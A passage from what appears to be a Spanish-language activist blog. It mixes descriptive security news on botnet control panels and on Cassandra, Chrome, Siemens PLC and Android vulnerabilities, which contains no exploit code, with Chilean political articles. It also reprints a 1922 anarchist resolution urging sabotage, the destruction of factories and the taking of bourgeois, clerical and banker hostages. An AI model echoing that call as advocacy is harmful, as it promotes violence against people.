El primer panel, simplemente identificado como “Panel Kraken”, ofrecía estadísticas básicas, enlaces para la descarga de malware adicional y otras opciones.

Un segundo panel, identificado como Anubis, contiene la versión actual de la plataforma C&C. Este panel proporciona mucha más información al operador que el panel Kraken original, y que permite ver el historial de comandos ejecutados y algunos datos sobre la víctima.

Una actualización posterior del Panel Anubis incluye la capacidad de que los operadores sean más selectivos al elegir objetivos para los comandos. En versiones anteriores, los operadores solo podían elegir la cantidad de víctimas a las que apuntar con el comando.

Esta amenaza sigue activa, por lo que los investigadores recomiendan implementar algunas medidas de seguridad, incluyendo:

  • Mantener su software antivirus siempre actualizado a la más reciente versión disponible
  • Habilitar la autenticación multifactor para evitar ataques de phishing y relleno de credenciales
  • Mantener copias de seguridad programadas con regularidad, ya sea de forma local o en la nube

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

32 comentarios

La huelga feminista transformó el movimiento social de Chile

Publicada el 08/03/2022 - 10/03/2022 por Anonymous Chile

La dinámica entre la movilización callejera y la Convención Constitucional, la autonomía con respecto al gobierno que asumirá el próximo 11 de Marzo y las demandas urgentes, porque «está en peligro la vida», son algunas de las tantas acciones que bullen en un «momento fundante», y también en la construcción de un feminismo transfronterizo internacionalista, que comparte estrategias para romper la lógica capitalista patriarcal.

La activista chilena y vocera de la CF8M, Pamela Valenzuela Cisternas, intenta estar en tres lugares al mismo tiempo. En el panel de apertura del Encuentro Feminismos y Sindicalismos, de cara al 8M, en Rosario, expone sobre el valor de la huelga general feminista que declararon en 2018 como clave en la transformación social en su país, Chile. “La huelga nos hizo poderosas”, afirma y luego cuenta que sus compañeras, a partir de octubre de 2019, decían: “Somos revuelta en la revuelta”. Al mismo tiempo, por zoom, en su país, hay dos asambleas a las que intenta seguir, porque todo ocurre al mismo tiempo. “Es un momento fundante”, apunta sobre lo que ocurre en Chile, donde la Comisión de Derechos Fundamentales de la Convención Constitucional aprobó en general la declaración de la interrupción voluntaria del embarazo como derecho humano, y esa victoria de la estrategia de la Asamblea por la Legalización del Aborto las encontró llorando, abrazadas, en la convicción de seguir alimentando la dinámica entre la lucha callejera y la construcción de una Carta Constitucional que ponga en el centro la vida. Pamela es una de las cuatro voceras de la Coordinadora Feminista 8M. “Hemos aprendido un montón de este movimiento feminista transfronterizo internacionalista que se despliega a lo largo de todo el mundo y, por ejemplo, a nosotras nos impacta de manera muy estratégica todo lo ocurrido en Argentina, la experiencia de tener esos Encuentros de Mujeres que se hacen desde 1986, la experiencia que tienen las compañeras en México que luchan contra una violencia desatada, que si bien es álgida en toda América Latina, en ciudades transfronterizas de México es un problema que habla del lugar de opresión que el capitalismo patriarcal quiere imponer a las mujeres, a las disidencias, a las niñeces, a las y les oprimidas”, dice rápido, para que no se le escape del torbellino de ideas que va desgranando con su pañuelo verde en la muñeca.

La lucha por la vida, contra la precarización de la vida, por un feminismo que derribe las políticas destructoras de la vida y los territorios, es el eje. “Es indudable la potencia que le ha impreso al movimiento social el feminismo desde su propia fuerza y es innegable, porque hoy día tú ves cosas que teníamos que disputar hasta hace pocos meses. Cuando nos desplegamos en 2018, el feminismo ya venía en alza desde el 2011 y progresivamente pudimos sacar de la institucionalidad elementos que habían sido acaparados, como el debate de los derechos sexuales y reproductivos, el debate de las violencias, que son parte de las banderas ‘clásicas’ del feminismo. Y en 2018 nosotras hicimos quiebre, retomamos el hilo histórico al plantear que el feminismo habla de todo”, señala la potencia que emergió para cambiar el mundo. “Nosotras nos lanzamos a llamar a la huelga general, que después permitió que emergiera la Coordinadora Feminista 8 de marzo, y que también fortaleció a un montón de organizaciones feministas a lo largo del territorio. Sin duda, que hayamos sido más de un millón de mujeres y disidencias en la calle el 8 de marzo del 2019 tuvo un impacto para el movimiento social del país. La huelga volvió a ponerse en la mesa como una herramienta de lucha, que puede transformar la situación en que vivimos”, describe lo central de los feminismos en el proceso de su país desde octubre de 2019. “Somos un movimiento que es capaz de abrir caminos, de transformarlo todo y de cuestionarlo todo, de ser profundamente subversivo”, abunda.
Una Constitución feminista

Desde la Coordinadora impugnaron la Convención Constitucional. “No es el proceso que nosotras queríamos y salimos a impugnar el pacto entre los partidos, entre ellos el del presidente que va a asumir el 11 de marzo, porque precisamente nosotras veíamos que ahí se cortaba una posibilidad de optar por una asamblea feminista constituyente, una asamblea popular Constituyente”, sigue su relato. Pero decidieron participar “sí o sí” de la Convención porque “históricamente lo que ha pasado es que la derecha copta los procesos”. Así fue que decidieron “no delegar nunca más” la palabra.

Lo que esperan es que la nueva Carta Constitucional “pueda seguir abriendo caminos y que no quede solamente en una letra escrita en una Constitución y que nadie pesque nada, sino que se transforme en leyes, se transformen en procesos deliberativos democráticos, o sea, se transforme en una nueva sociedad. Nosotras estamos debatiendo la relevancia de las regiones, o sea, de la autonomía regional, la recuperación de las aguas, que la justicia sea paritaria, plurinacional y con enfoque de género, que la democracia sea paritaria en términos de paridad sustantiva y de igualdad sustantiva. Entonces son todas cosas que van mucho más allá de lo que se ha propuesto incluso el mismo gobierno que va a subir, sino que son nuestras son nuestras exigencias de vidas, son nuestras urgencias por vencer, son cómo nos imaginamos el mundo que queremos vivir”.

Sobre el gobierno que asumirá el 11 de Marzo próximo, al que la Coordinadora Feminista 8M llamó a votar, mantendrán su autonomía. “Llamamos a votar por Gabriel Boric, porque si no llamábamos a votar por él, avanzaba un sector de la derecha pinochetista, que planteaba lo que decía Simone de Beauvoir, que las mujeres y las disidencias siempre tenemos que estar luchando por nuestros derechos porque nunca en verdad están completamente adquiridos y en cualquier momento aparecen procesos de restauración patriarcal que los tiran para atrás”, dice sobre ese proceso en el que los feminismos se movilizaron para impedir el retorno de la derecha más violenta.

“Cuando nosotras decimos nuestras urgencias son por vencer es porque estamos poniendo en el centro cosas que si no son modificadas hoy, lo que está en peligro es la vida. O sea, sin agua no hay vida. Sin posibilidad de trabajar, no hay posibilidad de vivir, si no hay salarios dignos tampoco, si los pueblos originarios no tienen acceso a los territorios que ancestralmente les quitaron y se siguen imponiendo el monocultivo, las forestales, las salmoneras, el extractivismo, tampoco va a haber territorio que sostener. Entonces, este programa y ese plan de lucha, no sabemos hasta qué punto el gobierno que está por asumir lo puede consolidar”. Por eso, se declaran “un poco escépticas del gobierno que asumirá” y mantendrán “la autonomía y la deliberación colectiva”.
La lucha por el aborto

La reciente votación –primero en general y el 23 de febrero, en particular- del acceso a los derechos sexuales y reproductivos y el aborto en la Comisión de Derechos Fundamentales de la Convención Constitucional es producto de lo que Pamela Valenzuela Cisternas define como “una lucha muy bonita porque ejemplifica esto de la retroalimentación transfronteriza en el movimiento feminista y todo lo que nos ha servido aprender a nosotras del proceso incluso que se vive en Argentina”. Cuenta que hicieron un Foro Latinoamericano con participantes de México y Argentina, entre otros países. “Aprendimos un montón, incluso teniendo legalizado el aborto, de todas las trabas que te pone la institucionalidad para poderlo aplicar, con todas las diversidades y diferencias políticas, sociales, económicas y de acceso que existen en regiones diversas, como son nuestros países de Latinoamérica que no es lo mismo quienes viven en una ciudad centro que vivir en un pueblo en Magallanes o en una zona extrema o en una zona andina”, relató.

En 2021 constituyeron la Asamblea por la Legalización del Aborto, en la que participa la Coordinadora Feminista 8M, con tres objetivos: el primero fue consignar los derechos sexuales y reproducción y el derecho humano al aborto en la Constitución, el segundo es la legalización del aborto y el tercero es la despenalización social del aborto.

El mecanismo que usaron para llevar el aborto a la Convención fue uno que pudieron instalar los movimientos sociales, las iniciativas populares de normal. Hacían falta 15 mil votos para que el tema se trate y lograron, antes que ninguna otra propuesta, más que duplicar ese número, ya que llegaron a 39.000. “Lo impactante de toda esta cantidad, es que solo hecho de que ocurriera eso hizo que voces que estaban dubitativas que dudaban, hoy en día nos apoyen. Entonces es eso que hablaba, no es la Convención por un lado y los pueblos movilizados por otros, sino que es algo que tiene que estar unido y que ocurre al mismo tiempo”.

200 comentarios

Vulnerabilidad RCE en Apache Cassandra

Publicada el 07/03/2022 - 05/03/2022 por Anonymous Chile

Esta semana se publicó un informe técnico completo sobre una vulnerabilidad crítica de ejecución remota de código (RCE) recientemente corregida en Apache Cassandra, una base de datos NoSQL distribuida que ofrece alta escalabilidad muy popular entre compañías como Cisco, Netflix, Reddit, Twitter, Urban Airship, OpenX y más.

Identificada como CVE-2021-44521, la vulnerabilidad solo afecta las configuraciones no predeterminadas de la base de datos, lo que podría llevar al compromiso completo del sistema afectado. Esta vulnerabilidad recibió un puntaje de 8.4/10 según el Common Vulnerability Scoring System (CVSS), según los especialistas de Jfrog.

La falla solo se presenta si la funcionalidad para crear funciones definidas por el usuario (UDF) para el procesamiento personalizado de datos está habilitada en Cassandra, y solo puede ser abusada si el atacante tiene suficientes permisos para crear estas UDF. Esta no es una configuración predeterminada y se ha documentado como insegura anteriormente.

La función UDF en Cassandra se pueden escribir en Java y JavaScript, y este último utiliza el motor Nashorn, por lo que no se garantiza que sea seguro al aceptar código que no es de confianza y lo mejor sería ejecutarlo en un entorno seguro.

Si bien Cassandra implementa un entorno limitado para restringir el código UDF, al habilitar algunas configuraciones opcionales los actores de amenazas podrían abusar del motor Nashorn para escapar del entorno seguro y ejecutar código remoto en el sistema afectado.

Las implementaciones de Cassandra son vulnerables cuando están configuradas para permitir UDF con secuencias de comandos, pero no subprocesos de UDF. De forma predeterminada, los subprocesos UDF están habilitados, lo que significa que cada función UDF invocada se ejecuta en un subproceso independiente. Cuando los UDF están habilitados, todos los usuarios pueden crear y ejecutar UDF arbitrarios, incluidos los que iniciaron sesión de forma anónima.

En su informe técnico sobre CVE-2021-44521, Jfrog detalló un proceso que permitió evadir el entorno sandbox de Cassandra, demostrado en su prueba de concepto (PoC). La firma de seguridad también señaló la identificaron de algunas otras fallas, incluyendo ataques de denegación de servicio (DoS) y otras vulnerabilidades RCE.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

168 comentarios

Vulnerabilidades día 0 en Google Chrome afectan a millones de usuarios

Publicada el 04/03/2022 - 26/02/2022 por Anonymous Chile

Google ha emitido una actualización para usuarios de Chrome en sistemas operativos Windows, Linux y macOS con el fin de abordar una vulnerabilidad día cero que podría haber sido explotado activamente por hackers maliciosos, además de abordar otras vulnerabilidades severas que afectan a todas las versiones del popular navegador.

Si bien la compañía se reservó los detalles técnicos sobre las vulnerabilidades debido al riesgo de explotación activa, se publicaron algunas descripciones de los problemas detectados, que incluyen:

  • CVE-2022-0603: Error use-after-free en Chrome File Manager
  • CVE-2022-0604: Desbordamiento de búfer de almacenamiento dinámico en grupos de pestañas
  • CVE-2022-0605: Error use-after-free en la API de Webstore
  • CVE-2022-0606: Error use-after-free en ANGLE
  • CVE-2022-0607: Error use-after-free en GPU
  • CVE-2022-0608: Desbordamiento de enteros en Mojo
  • CVE-2022-0609: Error use-after-free en Animation
  • CVE-2022-0610: Implementación inapropiada en Gamepad API

Para los especialistas en ciberseguridad, los errores use-after-free siguen siendo la forma más frecuente y eficiente para explotar fallas en navegadores Chrome. Cinco de estas vulnerabilidades son errores use-after-free, por lo que ya se han detectado 26 de estas fallas en Chrome solo durante 2022.

El término use-after-free se refiere a un error en la memoria de un sistema cuando un programa no puede borrar el puntero a la memoria después de liberarla. Otra amenaza común para los usuarios de navegadores web son los errores de desbordamiento de búfer, que puede resultar en un escenario crítico para los datos críticos almacenados en los sistemas vulnerables.

Los usuarios del navegador web deberán actualizar a la versión 98.0.4758.102 para mitigar el riesgo de explotación. Esta actualización será emitida en los próximos días, por lo que los usuarios deberán limitar la exposición de sus sistemas mientras los parches están listos. Verifique la versión de Chrome que está ejecutando su sistema en las Configuraciones del navegador.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

612 comentarios

Contra la guerra y el militarismo: Resolución del congreso fundador de la AIT (1922)

Publicada el 03/03/2022 - 01/03/2022 por Anonymous Chile

El militarismo es el sistema de violencia monopolística del Estado con el propósito de defender y expandir el teatro nacional de explotación (guerra defensiva o guerra de agresión), para poner bajo control nuevos teatros de explotación (guerra colonial) y para reprimir con dureza a las masas populares rebeldes (huelgas, disturbios, revueltas).

En todos los casos, el objetivo es preservar y aumentar los beneficios de las clases dominantes, es decir, la clase enemiga del proletariado.

El militarismo es el último y más poderoso recurso de que dispone la burguesía para mantener a la clase obrera bajo su control y sofocar sus luchas por la libertad. En todos los lugares en los que se ha moldeado un nuevo militarismo en las luchas nacionales o de liberación (Rusia, China), siempre ha rebotado contra los propios trabajadores, porque, por su propia naturaleza, es un instrumento para reprimir a las masas en beneficio de una clase privilegiada y tiene que oponerse a toda libertad.

Por lo tanto, la tarea primordial de la clase obrera no es sólo combatir el materialismo capitalista del presente, sino también acabar con el militarismo como tal. Los mejores medios para combatir el militarismo serán los que mejor se adapten a la mentalidad antimilitarista.

Se trata, sobre todo, de romper la mentalidad del militarismo, la disciplina y la sumisión mediante una propaganda activa, educando a los soldados y minando los fundamentos de los ejércitos para que pierdan su eficacia contra los trabajadores. Los ejércitos voluntarios, los ejércitos blancos, los ejércitos fascistas, etcétera, deben ser objeto de boicot incluso en tiempos de paz.

Dado que el grueso del ejército está formado por trabajadores y que la tecnología de la guerra moderna, en su estado actual, depende totalmente de las industrias bélicas, los trabajadores tienen en su mano detener toda la actividad militarista mediante la negativa a prestar servicio, las huelgas, el sabotaje y el boicot, incluso si esa acción militar la llevan a cabo las tropas blancas.

La mejor manera de sentar las bases aquí y ahora para esa acción de masas es la negativa individual a servir y que el proletariado organizado se niegue a fabricar armamento.

Por encima de todo, el objetivo es frustrar el estallido de una nueva guerra y, para ello, desterrar las principales causas de la guerra y el militarismo mediante la realización de una transformación económica de nuestro actual orden social (revolución social).

Por lo tanto, el Congreso hace un llamamiento a todas las organizaciones afiliadas a la AIT a difundir, por medios prácticos y con efecto inmediato, el rechazo a la fabricación de material bélico. Persuadir a los trabajadores de las fábricas de armamento o de las empresas susceptibles de convertirse en tales, de que la clase obrera tiene el deber de responder a la amenaza de guerra con la amenaza de huelga, de incautar los materiales de guerra y todos los demás materiales que puedan ser utilizados para su fabricación; y de inutilizar las fábricas para el capitalismo.

Las organizaciones afiliadas deben constituir, siempre que puedan, Comités de Huelga General, cuya tarea consistirá en buscar los medios para tomar las fábricas, retenerlas y, en caso de que estén en peligro de ser recuperadas por los capitalistas, destruirlas. Deben buscar también los medios de apoderarse de los centros neurálgicos de la organización nacional; de los centros ferroviarios y de las líneas de ferrocarril, de las minas, de las centrales eléctricas, de los correos y telégrafos, de los puntos de distribución de agua, de los servicios sanitarios y de los productos farmacéuticos; deben tomar rehenes entre la burguesía, los políticos, el clero y los banqueros.

130 comentarios

Ataques DDoS afectan dispositivos PLC de Siemens

Publicada el 02/03/2022 - 26/02/2022 por Anonymous Chile

En su más reciente alerta de seguridad, Siemens anunció el lanzamiento de parches para abordar múltiples vulnerabilidades críticas cuya explotación permitiría bloquear de forma remota algunos modelos de controladores lógicos programables (PLC).

La compañía corrigió un total de 27 vulnerabilidades, tres de las cuales podrían ser explotadas por actores de amenazas remotos no autenticados para el despliegue de ataques de denegación de servicio (DoS) contra algunos productos de la familia SIMATIC.

https://noticiasseguridad.com/nsnews_u/2022/02/siemens01.jpg

Las tres fallas más severas fueron identificadas como CVE-2021-37185, CVE-2021-37204 y CVE-2021-37205 y podrían ser explotadas mediante el envío de paquetes especialmente diseñados a través del puerto TCP 102 hacia el dispositivo afectado. El ataque exitoso forzaría la interrupción de los servicios, lo que solo podría ser corregido con el reinicio de los dispositivos PLC.

Siemens reporta que las fallas residen en los productos PLC SIMATIC S7-1200 y S7-1500, SIMATIC Drive Controller, ET 200SP Open Controller, S7-1500 Software Controller, SIMATIC S7-PLCSIM Advanced, el módulo de comunicación TIM 1531 IRC y en los productos SIPLUS extreme.

Gao Jian, investigador de seguridad que presentó el reporte a Siemens, menciona que estas son solo algunas de las ocho vulnerabilidades que ha informado recientemente a la compañía. Los problemas restantes siguen siendo investigados.

Jian explicó que las vulnerabilidades están relacionadas con la pila de protocolos de comunicación OMS+ utilizada por los productos de Siemens. Los productos PLC de Siemens se pueden proteger contra operaciones no autorizadas habilitando una opción de nivel de acceso y configurando una contraseña, aunque el ataque funciona incluso si están habilitadas estas protecciones.

Es por ello que las fallas pueden ser explotadas incluso con las mejores protecciones disponibles para los sistemas PLC: “Estas fallas pueden ser explotadas por hackers maliciosos con acceso al dispositivo objetivo en el puerto TCP 102. La explotación directamente desde Internet también puede ser posible si el PLC está expuesto en línea”, explica el investigador.

Un reporte completo está disponible en las plataformas oficiales de Siemens. Los administradores de implementaciones afectadas deben actualizar a la brevedad para prevenir el riesgo de explotación.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

166 comentarios

Familia Kast posee derechos de agua equivalentes al consumo diario de 100 mil personas

Publicada el 01/03/2022 - 26/02/2022 por Anonymous Chile

En su programa de gobierno, el candidato ultraderechista asegura que van a priorizar “el consumo humano a través de la cobertura de agua potable para toda la población”. Desde el comando de Kast no indicaron si entregarían o no derechos de aprovechamiento de privados para garantizar el recurso a todos.

El general Augusto Pinochet estaba disconforme. Aquel 7 de febrero de 1979, Pinochet terminaba de escuchar la exposición de Miguel Kast Rist, hermano del candidato José Antonio Kast (P. Republicano) y entonces ministro director de la Oficina de Planificación, sobre el proyecto de ley que modifica el régimen de derechos de agua. “En realidad, como lo dije desde la partida, les advierto que este decreto ley me cuesta harto sueño”, expresó el dictador, ya que “este asunto ha sido toda la vida una bomba permanente en los campos: se mata a la gente”.

El decreto, del cual terminaría emanando la actual legislación en materia de distribución, venta y acceso al agua, fue firmado igualmente. “Como es urgente este decreto para arreglar la situación, se lo firmo, haciéndole presente que podemos tener dificultades”, se puede leer en el acta de la Junta Militar. Miguel Kast Rist, ante consultas del general dictador, procedió a dar una explicación sobre la parte operativa del proyecto. Pinochet no quedó convencido: “Si viene el problema, usted va a pagar el pato…”, le espetó. (Revise el acta en el siguiente enlace).

Han transcurrido 42 años de aquella reunión y 40 desde que se promulgó el Código de Aguas, siendo la relación de la familia Kast con el negocio del agua una constante hasta hoy. En investigaciones recientes respecto al tema, se cruzó la información disponible en el Catastro Público Aguas de la Dirección General de Aguas (DGA) con sociedades compuestas por la familia del candidato presidencial del Frente Social Cristiano, encontrando que entre cuatro empresas y dos personas naturales poseen un total de 198,3 litros por segundo en derechos de agua.

En consecuencia, si se toma en cuenta el consumo promedio por persona de 170 litros diarios que calcula la Superintendencia de Servicios Sanitarios, la familia del ultraderechista posee agua como para abastecer a 100.783 personas.

La propiedad hídrica de los Kast es, en todos los casos, del tipo consuntivo, es decir, que no son restituidos a los acuíferos o cursos de agua; además de ser continuos y permanentes, lo que implica que pueden extraer esa cantidad de agua sin restricción alguna.

Los derechos de agua provienen de distintas fuentes, algunas en regiones con escasez hídrica como lo son la región Metropolitana, con derechos sobre el Río Maipo, y la de Los Lagos, provenientes del Río Bueno y Puelo.

El mismo programa presidencial de José Antonio Kast, en la página 51 bajo el título Acción para enfrentar la sequía y lograr la seguridad hídrica, asegura que propondrán “una hoja de ruta para alcanzar la seguridad hídrica de la población en 8 años, priorizando el consumo humano a través de la cobertura de agua potable y saneamiento para toda la población”.

Siguiendo esta premisa, diversos investigadores han contactado al comando del candidato republicano para consultar si en un eventual gobierno quitarían de manos de privados derechos de agua para garantizar el consumo humano de la población y, específicamente, sí lo haría con los derechos de agua que posee su familia. Indicaron que, considerando el cierre de campaña, no había posibilidad de enviar una respuesta.

El mismo ejercicio fue realizado con la familia del candidato Gabriel Boric, sin encontrar que los Boric Scarpa, Font Aguilera y Boric Font fueran titulares de derechos de agua o dueños de sociedades que posean dichos derechos.

El negocio del agua en la candidatura de José Antonio Kast

Los derechos de agua se concentran en la Región Metropolitana, en la comuna de Paine, lugar donde se inician los negocios de la familia Kast con la llegada de los padres de José Antonio Kast. Michael Kast Schindele llega Chile desde Alemania tras huir de la segunda Guerra Mundial, miembro del partido nazi y teniente del ejército de Hitler.

Inmobiliaria Bavaria Limitada, propiedad de Christian Kast Rist, hermano del candidato presidencial del Frente Social Cristiano, posee derechos de agua por 95 L/S sobre la cuenca del Río Maipo, todos consuntivos.

También los Kast concentran derechos de agua a través de la Inmobiliaria San Miguel Ltda., de propiedad de Christian Kast Rist y donde hasta al menos el 2016 participó José Antonio. La sociedad posee 64,5 L/S, lo que significa según información disponible en el portal de transacciones de derechos de aprovechamientos de agua de la empresa Agua Circular, un capital de 193 millones 500 mil pesos si se considera que en el mercado del agua hoy cada litro por segundo se comercializa a aproximadamente 3 millones de pesos.

Los derechos de agua de esta sociedad en la que participó el candidato de la ultraderecha se concentran en la Región Metropolitana, específicamente en la comuna de Paine, y provienen directamente del Río Maipo. Al igual que los anteriores, son consuntivos y entregados de forma permanente y continua.

Por su parte, Michael Kast Schindele, el padre de José Antonio, aún mantiene registrados 4 litros por segundo en la comuna de Puerto Varas, los que afectan las Cuencas e Islas entre Río Bueno y Río Puelo; todos consuntivos, permanentes y continuos. A pesar de su fallecimiento en 2014, el registro aún se los adjudica a él, siendo posible que estos hayan sido traspasados mediante herencia a algún familiar y su propiedad no se encuentre actualizada en el registro de la DGA.

María Francisca Maira Kast, sobrina de José Antonio, posee 30 L/S con afectación a la cuenca del río Maipo con el mismo tipo de derecho que sus familiares.

Cierran la lista dos sociedades donde participa Christian Kast Rist: Inversiones San Miguel Limitada, la que posee 2 L/S, y Agrícola Camino Viejo Limitada, donde hasta el 2017 también participaba José Antonio, la cual mantiene 2.8 L/S de su propiedad. Todos los derechos anteriores son consuntivos, permanentes y continuos, los que afectan a en primer lugar la cuenca del Río Maipo y en el caso de Agrícola Camino Viejo, las cuencas “Costeras entre Laguna Blanca, Seno Otway, canal Jeronimo y Magallanes”, en la comuna de Punta Arenas.

El rol del hermano de José Antonio Kast en la privatización del agua

El Código de Aguas, promulgado el 13 de agosto de 1981, es una de las políticas de privatización más significativas de la dictadura cívico-militar. Desde el momento en que el Decreto con Fuerza de Ley N° 1.122 dio origen a ese código, los derechos de agua se vieron inmersos en un sistema de transacciones en el mercado. De esta forma, pese a que el agua es un bien público, sus derechos de uso son de propietarios privados, los cuales -en la práctica- han poseído estos derechos a perpetuidad.

Un par de años antes, el 7 de febrero de 1979, la Junta Militar, presidida por el dictador Augusto Pinochet, sesionaba de forma “secreta y extraordinaria”. El punto tres de la tabla de esta reunión era el “proyecto de decreto ley que modifica el régimen de derechos de agua”, siendo expuesto por Miguel Kast Rist, ministro de ODEPLAN y hermano del candidato presidencial del Frente Social Cristiano. El ministro de Agricultura, Alfonso Márquez de la Plata Irarrázaval, también participó en la explicación.

Miguel Kast Rist, en dicha sesión de la Junta Militar desarrollada el verano de 1979, tenía un desafío: convencer al dictador Augusto Pinochet de firmar el decreto ley que privatizaría los derechos de agua en Chile.

El diagnóstico de Kast, expuesto en dicha sesión, era tajante: “el problema del agua es que, junto con la reforma agraria, se modificó la regla del juego básica y, en la práctica, hoy día el agua está totalmente controlada por el Estado y entregada solamente en usufructo a los particulares”.

Este punto fue la base de su argumentación, con la que buscaba transformar la estructura con la que el Estado administraba las aguas. “Los principios establecidos aquí rigen de inmediato para que desde ese día la gente quede asegurada de que si le quitan el agua tienen que indemnizar, como si la despojaran de cualquiera otra cosa. Por lo tanto puede comenzar a hacer inversiones”, expresaba Kast Rist en su exposición ante la Junta Militar.

Según argumentaba el hermano del candidato presidencial, la administración y entrega de los derechos de aguas, posterior a la reforma agraria, habían estado sujetos a engorrosos trámites burocráticos que desincentivan la inversión, puesto que era muy difícil transferir los derechos de un privado a otro, así como se dificultaba la inversión por la falta de certeza de la mantención de los derechos para la inversión.

Kast explicó a la Junta Militar la filosofía detrás del Código de aguas exponiendo cuatro puntos que hasta hoy se mantienen vigentes: “Uno, la gente ve que a la sociedad y a ellos les cuesta tener el agua de que disponen; dos, se la incentiva, por lo tanto, a efectuar inversiones y liberar así parte del agua que tienen; tres, se abre la posibilidad de traspasar el recurso agua a otros usos o a terceros que estén dentro de la misma actividad, mediante un precio para que ellos puedan también expandir sus inversiones y cuatro se simplifica todo el sistema burocrático, en el sentido de que lo que hace el estado es mantener el registro de los traspasos que se producen, sea de un mismo particular en cuanto a usos, sea de un particular a otro en cuanto a transacción de este”.

La exposición de Miguel Kast ante la junta, explicando fondo y forma de la nueva estructura que se utilizaría para administrar los derechos de agua, no convenció al general y dictador. Sí fue apoyada por el vicealmirante Arturo Troncoso de la Armada, el general del Aire, Fernando Matthei y por el general Director de Carabineros, Mario Mackay.

Posterior a la intervención del ministro de ODEPLAN, Kast fue interpelado por Pinochet, quien en términos críticos se refirió al proyecto de privatización propuesto por el hermano de Jose Antonio Kast. “Ahora, mi gran preocupación, como se lo dije ayer al señor Ministro, es que no vaya a servir para que la gente que tiene agua extorsione al pobre que carece de ella, de manera que no quiera venderle agua por ningún motivo, ni siquiera al doble del precio normal, hasta que el interesado se aburra y tenga que vender la tierra que posee, ese es el problema; yo lo veo así”, indicó.

Pinochet advertía en ese momento parte de la problemática del campesinado que se vive en la actualidad; donde 184 comunas de las regiones de Los Lagos, Maule, O´Higgins, Metropolitana, Valparaíso, Coquimbo y Atacama y más de 1 millón 400 mil personas están bajo alguno de los 21 decretos de escasez hídrica vigentes. El uso indiscriminado del agua en el agro y la minería, en conjunto con la crisis climática, son factores relevantes para explicar la situación de buena parte del país en materia hídrica.

“Sin embargo, como es urgente este decreto para arreglar la situación, se lo firmo, haciéndole presente que podemos tener dificultades”, le advertía Pinochet a Kast. “Y si viene el problema, usted va a pagar el pato”.

Miguel Kast y el ministro de Agricultura no eran los únicos abocados a cambiar la estructura del uso del agua. El esquema a utilizar también mantenía ocupado a Luis Simon Figueroa del Río, titular de la subsecretaría de Bienes Nacionales por aquella época y padre del actual ministro de Educación, Raúl Figueroa Salas, siendo el encargado de redactar el Código de Aguas desde la Comisión Especial creada para dicha tarea entre 1979 y 1981.

Figueroa, experto en derecho civil con énfasis en agua y agricultura estableció el nuevo régimen que daba certeza jurídica a los nuevos dueños del agua, para luego trabajar en su aplicación desde la la subsecretaría de Agricultura (1981- 1983), la que lo recibió habiendo sido parte de la Sociedad Nacional de la Agricultura .

Miguel Kast Rist desde la Comisión de Riego y Simon Figueroa por la Comisión Especial empeñado en la redacción del Código de Aguas trabajaron coordinados de forma paralela, pero complementaria para sacar adelante la redacción de lo que sería el Decreto con Fuerza de Ley N° 1.122.

736 comentarios

Vulnerabilidad RCE en Android 12 afecta a millones de dispositivos y teléfonos móviles

Publicada el 28/02/2022 - 26/02/2022 por Anonymous Chile

La más reciente actualización del sistema operativo Android incluye un parche para una vulnerabilidad crítica identificada como CVE-2021-39675 que reside en el componente System y podría ser explotada para obtener acceso remoto o realizar ataques de escalada de privilegios en los dispositivo afectados.

Aunque la compañía no ha revelado amplios detalles sobre esta falla, se menciona que el error se relaciona con el código NFC inalámbrico de Android, que contiene una verificación adicional para asegurarse de que un parámetro de tamaño no sea demasiado grande. Es posible que Google no quiera compartir información sobre la falla debido a la posible explotación.

https://noticiasseguridad.com/nsnews_u/2022/02/android09022022.jpg

Además de esta falla, Google abordó cinco vulnerabilidades de alta gravedad en el componente System de Android, incluyendo errores de escalada de privilegios en Android 11 y 12, y una falla de denegación de servicio (DoS) en Android 10 y 11.

El componente System no es la única implementación de Android afectada por las vulnerabilidades. El reporte también señala el hallazgo de cinco errores severos en el componente Framework de Android cuya explotación permitiría obtener altos privilegios en los sistemas vulnerables; las fallas podrían ser encadenadas con otros errores para ataques adicionales.

Estas fallas fueron abordadas en el paquete de actualización 2022-02-01. Un conjunto adicional de parches, emitidos esta semana, abordan un error de alta severidad en System, una falla en el componente Fastboot de Amlogic, cinco errores en el código de MediaTek, tres en código Unisoc y 10 fallas de alta gravedad en el código de Qualcomm. Los usuarios solo deberán aplicar estas actualizaciones si sus dispositivos cuentan con estos chipsets.

Los usuarios de dispositivos Google Pixel serán los primeros en recibir estas actualizaciones para descargar e instalar, aunque el resto de los fabricantes no deberá esperar demasiado para acceder a los parches. Los usuarios deben mantenerse al tanto de cada nueva actualización, ya que la compañía no suele enviar notificaciones para su instalación, un proceso que no está exento de críticas a Android.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

157 comentarios

Estructura y manejo de usuarios, contraseñas y grupos en GNU/Linux

Publicada el 25/02/2022 - 27/02/2022 por Anonymous Chile

Estudiando y analizando la estructura y manejo de ficheros /etc/passwd, /etc/shadow y /etc/group en sistemas GNU/Linux

Es un archivo que almacena información esencial que se requiere durante el inicio de sesión en sistemas GNU/Linux. Dicho de otra manera, ahí se va a almacenar información relativa a las cuentas de usuarios. El archivo guarda texto sin formato, el cual va a proporcionar información útil para cada cuenta de usuario.

El archivo /etc/passwd almacena información esencial, que se requiere durante el inicio de sesión en GNU/Linux. En otras palabras, almacena información de la cuenta del usuario. /etc/passwd es un archivo de texto sin formato. Contiene una lista de las cuentas del sistema, que proporciona información útil para cada cuenta, como ID de usuario, ID de grupo, directorio de inicio, shell y más.

El archivo /etc/passwd debe tener permiso de lectura general, ya que muchas utilidades lo usan para asignar un ID a los nombres de usuario. El acceso de escritura a este fichero está limitado a la cuenta de superuser/root. El archivo es propiedad de root y tiene como permisos 644. Lo que viene a significar que solo puede ser modificado por root o usuarios con privilegios de sudo.

Un rápido vistazo al archivo /etc/passwd

